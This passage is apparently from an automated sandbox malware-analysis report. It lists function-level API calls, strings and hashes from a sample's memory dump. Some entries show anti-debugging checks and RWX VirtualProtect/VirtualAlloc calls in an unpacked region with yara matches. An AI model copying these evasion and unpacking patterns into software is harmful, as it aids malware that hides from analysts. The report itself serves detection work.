SelectObject.GDI32(?,00000082), ref: 00C34675
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00C34699
SelectObject.GDI32(?,00000000), ref: 00C346AC
CreateCompatibleDC.GDI32(?), ref: 00C346C2
SelectObject.GDI32(?,?), ref: 00C346D7
SelectObject.GDI32(?,00000000), ref: 00C346E6
DeleteObject.GDI32(?), ref: 00C346EB
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00C3470B
GetPixel.GDI32(?,?,?), ref: 00C3472A
SetPixel.GDI32(?,?,?,00000000), ref: 00C34760
SelectObject.GDI32(?,?), ref: 00C34782
SelectObject.GDI32(?,00000000), ref: 00C3478A
DeleteObject.GDI32(00000082), ref: 00C3478F
DeleteObject.GDI32(00000082), ref: 00C347C1
__EH_prolog3.LIBCMT ref: 00C347F5
CreateCompatibleDC.GDI32(00000000), ref: 00C348C0
CreateCompatibleDC.GDI32(00000000), ref: 00C348CC

Strings

, xrefs: 00C345FA

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Object$Select$CompatibleCreate$Delete$H_prolog3Pixel$BitmapImageLoad
String ID:
API String ID: 1197801157-3916222277
Opcode ID: 729713266453516bfd851e1e14f4934d39415d6fa20728942c1d508e317a23fe
Instruction ID: 0c5d0d7056d5753fb6d3be41b4c4de7d90078d0cc3b6ecc3064ff6d3cfa26273
Opcode Fuzzy Hash: 729713266453516bfd851e1e14f4934d39415d6fa20728942c1d508e317a23fe
Instruction Fuzzy Hash: A8024AB0C10219DFCF15DFA4D881AAEBBB5FF09700F10416AF815AB256DB70AA45DFA1

Function 00C02092 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 142
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00C020CF
PathFindExtensionA.SHLWAPI(?), ref: 00C020E9
__strdup.LIBCMT ref: 00C02131
__strdup.LIBCMT ref: 00C0216F
__strdup.LIBCMT ref: 00C021A3
_strcpy_s.LIBCMT ref: 00C021E9
__strdup.LIBCMT ref: 00C021FE
_strcat_s.LIBCMT ref: 00C0222B
__strdup.LIBCMT ref: 00C0223D

Strings

.HLP, xrefs: 00C021DD
.CHM, xrefs: 00C021D6
.INI, xrefs: 00C0221E

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: __strdup$ExtensionFileFindModuleNamePath_strcat_s_strcpy_s
String ID: .CHM$.HLP$.INI
API String ID: 3308358609-4017452060
Opcode ID: 0900d40e8ca26246c53e368c9a49e7665a92e01dee5aa0c10fb9e5425db26ee3
Instruction ID: 8d90f75d4a4bad84258cfcf22fa67d998bc6b3eb84bd4a44bbe64a4ccaf5957c
Opcode Fuzzy Hash: 0900d40e8ca26246c53e368c9a49e7665a92e01dee5aa0c10fb9e5425db26ee3
Instruction Fuzzy Hash: D95155B19047599EDB20DF75CC49B9AB7FCAF04714F0009AAE665D6681EBB0DE84CF20

Function 00BE34B3 Relevance: 16.6, APIs: 11, Instructions: 106
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(00D32490,?,?,00000000,00D32474,00D32474,?,00BE38EE,00000004,00BDB67C,00BD7209,00BD43FF,00000214,00BD101B), ref: 00BE34C6
GlobalAlloc.KERNEL32(00000002,00000000,?,?,00000000,00D32474,00D32474,?,00BE38EE,00000004,00BDB67C,00BD7209,00BD43FF,00000214,00BD101B), ref: 00BE351C
GlobalHandle.KERNEL32(01316CA0), ref: 00BE3525
GlobalUnlock.KERNEL32(00000000), ref: 00BE352F
GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 00BE3548
GlobalHandle.KERNEL32(01316CA0), ref: 00BE355A
GlobalLock.KERNEL32(00000000), ref: 00BE3561
LeaveCriticalSection.KERNEL32(00000001,?,?,00000000,00D32474,00D32474,?,00BE38EE,00000004,00BDB67C,00BD7209,00BD43FF,00000214,00BD101B), ref: 00BE356A
GlobalLock.KERNEL32(00000000), ref: 00BE3576
_memset.LIBCMT ref: 00BE3590
LeaveCriticalSection.KERNEL32(00000001), ref: 00BE35BE

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: b061008d7242b79aaf6c47f777d53147fcaf9b8ebd3ceaac2900b46ca7ac6d12
Instruction ID: dea81812484e71310d1f3b2cb0a4f46b8ab5c967974e503cc5a25881803b3be1
Opcode Fuzzy Hash: b061008d7242b79aaf6c47f777d53147fcaf9b8ebd3ceaac2900b46ca7ac6d12
Instruction Fuzzy Hash: C531CD71600740AFC7219F69DC8DB5EBBF9EF44B00B0549ADE442D7660EB70FA408B20

Function 00BD1240 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 64
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00BD124E
_memset.LIBCMT ref: 00BD125E
_memset.LIBCMT ref: 00BD126E
_memset.LIBCMT ref: 00BD127E
_memset.LIBCMT ref: 00BD128B
_memset.LIBCMT ref: 00BD1298
_memset.LIBCMT ref: 00BD12A8
InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 00BD12F5

Strings

<, xrefs: 00BD12E2

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: _memset$CrackInternet
String ID: <
API String ID: 466913485-4251816714
Opcode ID: ad6bc44a95413c8dea4a87978b3165532cbe9a3fb488c896f479030240dc09a3
Instruction ID: 5cf8b5051eef99e251fde5c8723fc37290a4162c412f4b8ff2a6ec57e372a89d
Opcode Fuzzy Hash: ad6bc44a95413c8dea4a87978b3165532cbe9a3fb488c896f479030240dc09a3
Instruction Fuzzy Hash: 2821EAB0E40308BBEB01EFA5DC86F9EB7B4AB48710F108159F614BA2C1D6B4A6508F95

Function 00BDAE05 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 00BDAE38
SetLastError.KERNEL32(0000006F), ref: 00BDAE4F
CreateActCtxWWorker.KERNEL32(?), ref: 00BDAE97
CreateActCtxWWorker.KERNEL32(00000020), ref: 00BDAEB5
CreateActCtxWWorker.KERNEL32(00000020), ref: 00BDAED7

Strings

, xrefs: 00BDAE79

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: CreateWorker$ErrorFileLastModuleName
String ID:
API String ID: 3218422885-3916222277
Opcode ID: 9b237768eea59bd4d2375c4f8dbfe80b27ece278ed1b6a0c25aeeb3f031c23e9
Instruction ID: 595764b865a488cfccee2844a12de90a3697ed41f7ee5d6704c8e585b3aabf7a
Opcode Fuzzy Hash: 9b237768eea59bd4d2375c4f8dbfe80b27ece278ed1b6a0c25aeeb3f031c23e9
Instruction Fuzzy Hash: E4211D708002189FDB20DF65D8887EEF7F8BF54324F10469AD059D2290DB749B89DF51

Function 00C552B7 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00C552BE

Part of subcall function 00BFDA10: EnterCriticalSection.KERNEL32(00D333F0,?,?,00000000,?,00BE33DC,00000010,00000008,00BDB69B,00BDB632,00BD7209,00BD43FF,00000214,00BD101B), ref: 00BFDA4A
Part of subcall function 00BFDA10: InitializeCriticalSection.KERNEL32(?,?,?,00000000,?,00BE33DC,00000010,00000008,00BDB69B,00BDB632,00BD7209,00BD43FF,00000214,00BD101B), ref: 00BFDA5C
Part of subcall function 00BFDA10: LeaveCriticalSection.KERNEL32(00D333F0,?,?,00000000,?,00BE33DC,00000010,00000008,00BDB69B,00BDB632,00BD7209,00BD43FF,00000214,00BD101B), ref: 00BFDA69
Part of subcall function 00BFDA10: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,00BE33DC,00000010,00000008,00BDB69B,00BDB632,00BD7209,00BD43FF,00000214,00BD101B), ref: 00BFDA79

GetProfileIntA.KERNEL32(windows,DragMinDist,00000002), ref: 00C55316
GetProfileIntA.KERNEL32(windows,DragDelay,000000C8), ref: 00C55328

Strings

windows, xrefs: 00C55310, 00C55315, 00C55322
DragMinDist, xrefs: 00C5530B
DragDelay, xrefs: 00C5531D

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: CriticalSection$EnterProfile$H_prolog3InitializeLeave
String ID: DragDelay$DragMinDist$windows
API String ID: 3965097884-2101198082
Opcode ID: b886c728008c97bc4a2b2d059a7e601bba8e1b0d244338726310ddd677927519
Instruction ID: a4807af7d3d5aacaeaaeeb249115bd50e824d0f3b962a73120631b1d9ddf3da7
Opcode Fuzzy Hash: b886c728008c97bc4a2b2d059a7e601bba8e1b0d244338726310ddd677927519
Instruction Fuzzy Hash: EF0184B0A047049BC760AF269D41B29FAE8BF94B00F80150FE28597761CBF46505CF5A

Function 035CFFE7 Relevance: 7.6, APIs: 5, Instructions: 90
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,00000000,00000002,?,035CFCB5,00000000), ref: 035CFFF5
VirtualProtect.KERNEL32(00000000,0000000C,00000040,?,?,035CFCB5,00000000), ref: 035D0035
VirtualProtect.KERNEL32(00000000,0000000C,?,?), ref: 035D0068
VirtualProtect.KERNEL32(00000000,004014A4,00000040,?), ref: 035D0093
VirtualProtect.KERNEL32(00000000,004014A4,?,?), ref: 035D00BD

Memory Dump Source

Source File: 00000000.00000002.3120835473.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_35c0000_1.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 37e3d411deaf8316fac3a5409ea6f1d30f4815463f8cd534134295cee1b328aa
Instruction ID: 5cccda60e443d051e26485e5248d8726000f4dffd6e1bf4b7faa4a858aae5584
Opcode Fuzzy Hash: 37e3d411deaf8316fac3a5409ea6f1d30f4815463f8cd534134295cee1b328aa
Instruction Fuzzy Hash: 8921B3B620570A7FD770DA68AC48E7BB7ECFB84311F44083DBA46D34A0EB64E5058664

Function 00BD1DF0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 143
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,91693692), ref: 00BD1E2D
MessageBoxA.USER32(00000000,00D11A94,00D11A8C,00000000), ref: 00BD1F56

Part of subcall function 00BD15B0: GetCurrentProcess.KERNEL32(91693692), ref: 00BD16D1
Part of subcall function 00BD15B0: CheckRemoteDebuggerPresent.KERNEL32(00000000,?), ref: 00BD16DB
Part of subcall function 00BD15B0: GetCurrentProcess.KERNEL32(00000000), ref: 00BD16F3
Part of subcall function 00BD15B0: GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00BD16FC
Part of subcall function 00BD15B0: GetProcAddress.KERNEL32(00000000,NtQueryInformationProcess), ref: 00BD1708
Part of subcall function 00BD15B0: NtQueryInformationProcess.NTDLL(00000000,00000007,?,00000004,00000000), ref: 00BD171B

Strings

C:\Users\Administrator\Desktop, xrefs: 00BD1ECB
\, xrefs: 00BD1E7A

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Process$CurrentModule$AddressCheckDebuggerFileHandleInformationMessageNamePresentProcQueryRemote
String ID: C:\Users\Administrator\Desktop$\
API String ID: 2242570811-3054970496
Opcode ID: 10f826343dea2f87b3c63202af8518649eb449904be22c609f2d1c57dbd65911
Instruction ID: d69f967ae063a7e37be096a9d19565f512bc6db66981f7d8f32b70132f070356
Opcode Fuzzy Hash: 10f826343dea2f87b3c63202af8518649eb449904be22c609f2d1c57dbd65911
Instruction Fuzzy Hash: 2A514871901268ABCB25EB28CC817EEF7F5AB09700F104AEAE50967341EB345F85CF91

Function 035D00CD Relevance: 6.1, APIs: 4, Instructions: 90
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(00000000,000016CC,00000040,?), ref: 035D011B
VirtualProtect.KERNEL32(00000000,000016CC,?,?), ref: 035D014E
VirtualProtect.KERNEL32(00000000,00402AD1,00000040,?), ref: 035D0179
VirtualProtect.KERNEL32(00000000,00402AD1,?,?), ref: 035D01A3

Memory Dump Source

Source File: 00000000.00000002.3120835473.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_35c0000_1.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1e70e2575075489d053cc6fb2dca748f7a53306e9098dcd260615f23523f6c56
Instruction ID: de26cb17e3b20816694fd861f13f378b8eb19b7f7d039f5a6ae0a30cc17c1cd2
Opcode Fuzzy Hash: 1e70e2575075489d053cc6fb2dca748f7a53306e9098dcd260615f23523f6c56
Instruction Fuzzy Hash: E72188722047566FE770DAA9ED88E7777FCFB88201F04083DBA47D25A1EB74E5068660

Function 00C347EE Relevance: 4.6, APIs: 3, Instructions: 119COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C347F5
CreateCompatibleDC.GDI32(00000000), ref: 00C348C0
CreateCompatibleDC.GDI32(00000000), ref: 00C348CC

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: CompatibleCreate$H_prolog3
String ID:
API String ID: 2193723985-0
Opcode ID: 7491505510cb8e8809d24c75d9e8eeb7baed05265de938efa653308789a13360
Instruction ID: 66341a25e78a89b578388378acb5c2eefc773f671d61089269b359dc32d5e9e0
Opcode Fuzzy Hash: 7491505510cb8e8809d24c75d9e8eeb7baed05265de938efa653308789a13360
Instruction Fuzzy Hash: 7C51D1B0910765CFCB44DF69D88129A7BB4BF09B00F1081ABEC19DF25AE7B49541DFA1

Function 00BD34EE Relevance: 4.6, APIs: 3, Instructions: 70registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00D2B008,00000000,00000001,?), ref: 00BD3533
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 00BD3553
RegCloseKey.ADVAPI32(?), ref: 00BD3597

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: d01b74e065d96450855765e0cc8166cda74685d880ca72c4f30cbf8ca05bbdb9
Instruction ID: 59c9fafb08c1690e1283fb1aa50abafc61633b98098d7f95cfefebbc018cde9b
Opcode Fuzzy Hash: d01b74e065d96450855765e0cc8166cda74685d880ca72c4f30cbf8ca05bbdb9
Instruction Fuzzy Hash: 59212CB1D00204EFDB15CF86D984AAEFBF8EFA1718F2440ABE456A6251E7715F44CB12

Function 00CC6402 Relevance: 4.6, APIs: 3, Instructions: 54memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00CC641B

Part of subcall function 00CCDBA1: __NMSG_WRITE.LIBCMT ref: 00CCDBC8
Part of subcall function 00CCDBA1: __NMSG_WRITE.LIBCMT ref: 00CCDBD2

__NMSG_WRITE.LIBCMT ref: 00CC6422

Part of subcall function 00CCD9F2: GetModuleFileNameW.KERNEL32(00000000,00D36302,00000104,00000001,00BD7426,00000000), ref: 00CCDA8E
Part of subcall function 00CCD9F2: __invoke_watson.LIBCMT ref: 00CCDAB7
Part of subcall function 00CCD9F2: _wcslen.LIBCMT ref: 00CCDABD
Part of subcall function 00CCD9F2: _wcslen.LIBCMT ref: 00CCDACA

Part of subcall function 00CC6142: ___crtCorExitProcess.LIBCMT ref: 00CC614A
Part of subcall function 00CC6142: ExitProcess.KERNEL32 ref: 00CC6153

RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00BD7426,00BD7426,?,000000FF,?,00CCCFE9,00000011,00BD7426,?,00CCD3EE,0000000D), ref: 00CC6447

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ExitProcess_wcslen$AllocateFileHeapModuleName___crt__invoke_watson
String ID:
API String ID: 2361220029-0
Opcode ID: 76d7bda8ba2d70cc089b04778d7393c3f285781a19e360d3076aa74b8890ebb9
Instruction ID: c88caac78653fdf48db97cd9d266e4294e4bb037c5bb25690b095be62855b028
Opcode Fuzzy Hash: 76d7bda8ba2d70cc089b04778d7393c3f285781a19e360d3076aa74b8890ebb9
Instruction Fuzzy Hash: BB01DB36244302BAE715E735ED41F1B3699DB41360F11453DF5269A1D1DE70CD81EA70

Function 035CFB37 Relevance: 3.2, APIs: 2, Instructions: 216memorylibraryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 035CFB8F
LoadLibraryA.KERNEL32(00000238), ref: 035CFC2C

Memory Dump Source

Source File: 00000000.00000002.3120835473.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_35c0000_1.jbxd

Yara matches

Similarity

API ID: AllocLibraryLoadVirtual
String ID:
API String ID: 3550616410-0
Opcode ID: 51126b6fd836e9861d18a340eaab34de8d787920e2fff5e274c72b92ada8e67f
Instruction ID: 2665413fa03ff9eed0600a1bed1e5648757b512d759b7d9013922aa345e221a0
Opcode Fuzzy Hash: 51126b6fd836e9861d18a340eaab34de8d787920e2fff5e274c72b92ada8e67f
Instruction Fuzzy Hash: EE611332510B42AFCB31DAA4EC90A9BB7FAFF44218F19091DE64A49460D734F255CB91

Function 00BD3390 Relevance: 3.1, APIs: 2, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

_memmove_s.LIBCMT ref: 00BD3402

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: _memmove_s
String ID:
API String ID: 800865076-0
Opcode ID: b3e8ced38cae15cb48d98755fb5bd8ddea9c1e207667b9b4587a8e6850c162fd
Instruction ID: 0b4c05308ac8b8fcda8095b6d852b0eb76290ba6bb0039a5554a5265bd08724c
Opcode Fuzzy Hash: b3e8ced38cae15cb48d98755fb5bd8ddea9c1e207667b9b4587a8e6850c162fd
Instruction Fuzzy Hash: 701104326019149FCB00DF58D988E6EF7E9EF94720B0081ABF8049F316EA35AD418BD5

Function 00C0225F Relevance: 3.0, APIs: 2, Instructions: 36COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000000), ref: 00C0226D
SetErrorMode.KERNEL32(00000000), ref: 00C02275

Part of subcall function 00BDAE05: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 00BDAE38
Part of subcall function 00BDAE05: SetLastError.KERNEL32(0000006F), ref: 00BDAE4F

Part of subcall function 00C02092: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00C020CF
Part of subcall function 00C02092: PathFindExtensionA.SHLWAPI(?), ref: 00C020E9
Part of subcall function 00C02092: __strdup.LIBCMT ref: 00C02131
Part of subcall function 00C02092: __strdup.LIBCMT ref: 00C0216F
Part of subcall function 00C02092: __strdup.LIBCMT ref: 00C021A3

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Error__strdup$FileModeModuleName$ExtensionFindLastPath
String ID:
API String ID: 3517913719-0
Opcode ID: f53ccbda2502a17445be28fe1dcb04fc7df7b35cbe8c108428c015c8d9806fa7
Instruction ID: 36cb073a1a1fa8fcd94ec3fbe9293bf77c7b76d4c8e52b550c8a5a084d97294a
Opcode Fuzzy Hash: f53ccbda2502a17445be28fe1dcb04fc7df7b35cbe8c108428c015c8d9806fa7
Instruction Fuzzy Hash: 84F06D71A102549FCB64EFA5D405E5DBBD8AF45720F06809AF9189B3A2EB34D900CFA6

Function 00BDD876 Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

ActivateActCtx.KERNEL32(?,?,00D1ACE0,00000010,00BE03BD,hhctrl.ocx,00BDF5EF,0000000C), ref: 00BDD896
LoadLibraryW.KERNEL32(?), ref: 00BDD8AD

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ActivateLibraryLoad
String ID:
API String ID: 389599620-0
Opcode ID: 072d8cc2d07947ec111c4e24202c9824f6896da765a476ea2c19f2f4c09e10b0
Instruction ID: 212442f19c2056e3984a0736ce3257b1afe21422918cc262d0e0f6549dbb30ec
